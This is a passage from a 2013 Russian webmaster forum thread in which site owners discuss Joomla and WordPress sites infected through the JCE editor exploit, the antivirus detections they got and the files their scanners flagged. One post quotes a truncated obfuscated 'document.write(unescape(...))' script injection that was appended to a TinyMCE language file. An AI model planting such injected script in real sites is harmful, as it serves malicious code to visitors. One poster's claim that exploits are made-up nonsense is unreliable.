удалил и уже не мог редактировать материалы на сайте. Установил обратно...
А вообще еще не совсем понял - что у меня за зараза на сайте. Только ав Авира ругается когда сайт загружаю
перечисляет то js/iframe.ad, то js/fakeAD.m
Пробовал ai-bolit, но в виду своих знаний в программировании, не смог найти траблу... вот теперь ищу ответ профи...
Внимание всем владельцам сайтов на Joomla 1.5.x В JCE найден эксплоит.
(Ответов: 32, Просмотров: 9927)
- 09.02.2013 15:27
- 09.02.2013 20:23
- Регистрация: 08.02.2013
- Сообщений: 6
- Репутация: 1
Не вопрос!!! Возьметесь обновить мой сайт с рукописными модулями??? Заплачу и публично признаю себя идиотом!
Многие светлые головы не то что обновить, а даже исправить ошибку отображения разделов и статей пытались и смогли.
З.Ы. За разумную цену, конечно.
З.З.Ы.Опасность всяких там "эксплоитов" и "взломов" считаю надуманным бредом для новичков. - 09.02.2013 20:42
Спасибо сказали:
LoraDi(09.02.2013), - 10.02.2013 03:49
- 10.02.2013 04:11
Спасибо сказали:
feuer81(10.02.2013), - 10.02.2013 18:24
Интересно, сайт может быть уязвим если JCE установлен, но по умолчанию стоит и работает TinyMCE ?
- 10.02.2013 19:36
dik85, да, а смысл тогда ставить JCE, если Вы работаете со стандартным редактором TinyMCE?
- 10.02.2013 22:25
Смысл в том, что мне удобней пользоваться TinyMCE, однако JCE предлогает больше возможностей, среди которых и "медиабокс" для изображений. который я использую лишь когда надо сделать картинку с зумом, и некоторые другие. Но при добавлении простых статей, я использую TinyMCE
- 10.02.2013 23:19
- Регистрация: 08.02.2013
- Сообщений: 6
- Репутация: 1
- 22.03.2013 19:15
Ребята помогите советом или делом, работу конечно оплачу.
У меня несколько сайтов на жумле 1.5 и на последнем вордпресе, все заражены похоже через JCE (на жумле он слетел на всех сайтах), на андроиде уходит трафик на какие-то левые ресурсы по скачке файлов.
Что уже сделал:
Скопировал все с хостинга и проверил Касперским, нашел и удалил троянскую программу Backdoor.PHP.RemoteAdmin.ag на всех сайтах.
Потом прогнал сканером на хостинге, нашел много левых файлов с вредоносным кодом с названиями в виде цифр, тоже все поудалял.
Сканер еще показывает много вот такого текста в разных файлах:
k -D \"$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return) ; if($return)
* * This class uses the Unix `diff` program via shell_exec to compute the * differences between the tw
a8072",sandybrown:"#f4a460",seagreen:"#2e8b57",sea shell:"#fff5ee",sienna:"#a0522d",skyblue:"#87ceeb" ,slat
и так далее со словом shell.
Что делать дальше?
И вот еще много вот такого:
inyMCE.addToLang('',{ print_desc : 'Print' }); ;document.write(unescape("%3C%73%63%72%69%70%74%20 %74%79%70%65%3D%22%74%65
с фразой document.write(unescapeПоследний раз редактировалось mmi; 22.03.2013 в 19:29.
Тэги топика:
- html,
- index,
- joomla,
- joomlaforum,
- _ttp,
- большинство,
- быль,
- визуальный,
- вирус,
- владелец,
- внимание,
- возможность,
- всего,
- данный,
- мера,
- можно,
- найти,
- обновиться,
- обновлять,
- оказаться,
- популярный,
- просканировать,
- работа,
- расширение,
- редактор,
- сайт,
- случай,
- специальный,
- стоить,
- удалить,
- чистый,
- шаблон,
- эксплоить
Похожие темы
Темы | Раздел | Ответов | Последний пост |
---|---|---|---|
Покупка ссылок с новостных сайтов и сайтов "обо всём" | Вопросы от новичков | 4 | 03.10.2012 23:15 |
Сотрудничество владельцам сетей MFA-сайтов, увеличение доходов от Adsense | Другая работа | 19 | 30.05.2012 00:31 |
База трастовых сайтов -всем бесплатно | Прочее | 15 | 07.05.2012 12:38 |
На что обращать внимание при покупке сапо-сайтов | Дайджест блогосферы | 0 | 01.07.2010 11:17 |